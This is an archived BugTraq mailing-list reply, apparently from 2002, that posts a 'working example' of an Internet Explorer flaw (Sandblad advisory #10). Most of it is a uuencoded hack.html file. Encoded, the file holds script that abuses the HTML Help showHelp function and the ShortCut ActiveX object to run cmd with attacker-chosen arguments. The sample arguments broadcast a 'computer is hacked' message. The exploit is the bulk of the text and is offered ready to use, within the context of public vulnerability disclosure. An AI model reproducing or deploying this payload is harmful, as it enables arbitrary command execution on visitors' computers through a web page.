BugTraq
How to execute programs with parameters in IE - Sandblad advisory #10 Nov 06 2002 07:48PM
Andreas Sandblad (sandblad acc umu se) (1 replies)
Re: How to execute programs with parameters in IE - Sandblad advisory #10 Nov 08 2002 08:55AM
Gert Fokkema (gert why4 com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

A working example of the Sandblad advisory #10 is attached and also
available on

http://www.why4.com/hack.html

WeHack4You CyberStalking Consultancy

WWW : http://www.why4.com
E-Mail : info (at) why4 (dot) com [email concealed]
Voice&FAX : +31 (0)87 190 1989
Voice&FAX : +1 206 666 4949

Inschrijving Kamer van Koophandel
Registered member Chaimber-of-Commerce

PGP-signed and PGP-encrypted E-mail welcomed and preferred

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Security 7.0.3

iQA/AwUBPct8BLTplDhtALs5EQJO0ACgpXYGAH7AC2c9mmA6KOTWzQ3cMNkAnjT2
tUGF3mvsnX7drwxaieeR/K3c
=NvQB
-----END PGP SIGNATURE-----

begin 666 hack.html
M/$A434P^#0H\0D]$63X-"CQS8W)I<'0^#0HO+R B2&]W('1O(&5X96-U=&4@
M<')O9W)A;7,@=VET:"!P87)A;65T97)S(&EN($E%(BP@,C P,BTQ,2TP-@T*
M+R\@4V%N9&)L860@861V:7-O<GD@(S$P+"!!;F1R96%S(%-A;F1B;&%D+"!S
M86YD8FQA9$!A8V,N=6UU+G-E#0IP<F]G(#T@)V-M9"<[#0IA<F=S(#T@)R]K
M(&YE="!S96YD("H@+BY(14Q0+BY-62XN0T]-4%5415(N+DE3+BY(04-+140N
M+B<[#0H-"FEF("@A;&]C871I;VXN:&%S:"D@>PT*("!S:&]W2&5L<"AL;V-A
M=&EO;BLB(S$B*3L-"B @<VAO=TAE;' H(FEE>'!L;W)E+F-H;2(I.PT*("!B
M;'5R*"D[#0I]#0IE;'-E(&EF("AL;V-A=&EO;BYH87-H(#T]("(C,2(I#0H@
M(&]P96XH;&]C871I;VXK(C(B*2YB;'5R*"D[#0IE;'-E('L-"B @9B ](&]P
M96YE<BYL;V-A=&EO;BYA<W-I9VX[#0H@(&]P96YE<BYL;V-A=&EO;CTB<F5S
M.B([#0H@(&8H(FIA=F%S8W)I<'0Z;&]C871I;VXN<F5P;&%C92@G;6LZ0$U3
M2513=&]R93I#.B<I(BD[#0H@('-E=%1I;65O=70H)W)U;B@I)RPQ,# P*3L-
M"GT-"F9U;F-T:6]N(')U;B@I('L-"B @9B@B:F%V87-C<FEP=#ID;V-U;65N
M="YW<FET92@G/&]B:F5C="!I9#UC,2!C;&%S<VED/6-L<VED.F%D8B(K#0H@
M(" B.#@P838M9#AF9BTQ,6-F+3DS-S<M,#!A83 P,V(W83$Q/CQP87)A;2!N
M86UE/4-O;6UA;F0@=F%L=64B*PT*(" @(CU3:&]R=$-U=#X\<&%R86T@;F%M
M93U)=&5M,2!V86QU93U<(BPB*W!R;V<K(BPB*V%R9W,K(EPB/CPO(BL-"B @
M(")O8FIE8W0^/&]B:F5C="!I9#UC,B!C;&%S<VED/6-L<VED.F%D8C@X,&$V
M+60X9F8M,3%C9BTY,S<W(BL-"B @("(M,#!A83 P,V(W83$Q/CQP87)A;2!N
M86UE/4-O;6UA;F0@=F%L=64]0VQO<V4^/"]O8FIE8W0^)RDB*3L-"B @9B@B
M:F%V87-C<FEP=#IC,2Y#;&EC:R (at) I (dot) V [email concealed],R+D-L:6-K*"D[(BD[#0H@(&-L;W-E
E*"D[#0I]#0H\+W-C<FEP=#X-"CPO0D]$63X-"CPO2%1-3#X-"@``
`
end

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus